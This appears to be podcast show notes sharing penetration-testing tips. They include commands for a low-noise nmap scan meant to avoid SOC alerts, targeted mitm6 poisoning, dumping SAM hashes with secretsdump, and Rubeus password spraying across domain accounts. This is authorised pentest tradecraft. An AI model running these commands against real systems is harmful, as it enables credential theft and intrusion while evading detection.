SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Welcome to another fun tale of pentest pwnage! This one isn’t a telling of one single pentest, but a collection of helpful tips and tricks I’ve been using on a bunch of different tests lately. These tips include:
-
I’m seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like:
nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
-
Using mitm6 in "sniper" mode by targeting just one host with:
mitm6 -hw victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
-
Using secretsdump to target a single host:
secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO
. Note the colon afterlocaladmin
– it’s intentional, NOT an error! -
Rubeus makes password spraying easy-peasy!
Rubeus.exe spray /password:Winter2022 /outfile:output.txt
. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold! -
LDAPs relaying not working? Make sure it’s config’d right:
nmap -p636 -sV -iL txt-file-with-dcs-in-it
Share on socials: